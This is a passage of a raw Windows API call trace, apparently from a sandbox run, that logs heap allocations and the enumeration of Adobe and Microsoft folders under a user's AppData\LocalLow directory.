dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.729] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0239.729] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0239.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0239.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0239.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0239.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86c60 [0239.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0239.730] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.730] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.730] PathFindFileNameW (pszPath="") returned="" [0239.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0239.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.731] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.731] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0239.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e7c0 [0239.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e858 [0239.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0239.731] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0239.731] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.731] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e7c0 [0239.732] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e858 [0239.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0239.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0239.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0239.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0239.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0239.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0239.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.732] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.732] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.732] PathFindFileNameW (pszPath="") returned="" [0239.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0239.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0239.733] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.733] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.733] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0239.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0239.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0239.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0239.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.734] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.734] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.734] PathFindFileNameW (pszPath="") returned="" [0239.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.735] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.735] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0239.735] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0239.735] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0239.735] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.736] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.736] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.736] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0239.736] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0239.736] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0239.736] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0239.736] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.736] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.736] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.736] PathFindFileNameW (pszPath="") returned="" [0239.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.700] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.700] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0240.701] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.701] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.701] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.701] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0240.701] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0240.701] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.701] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.701] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.701] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.701] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.701] PathFindFileNameW (pszPath="") returned="" [0240.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0240.702] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0240.702] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0240.702] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.702] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.702] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.702] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0240.703] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0240.703] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.703] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.703] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.703] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.703] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.703] PathFindFileNameW 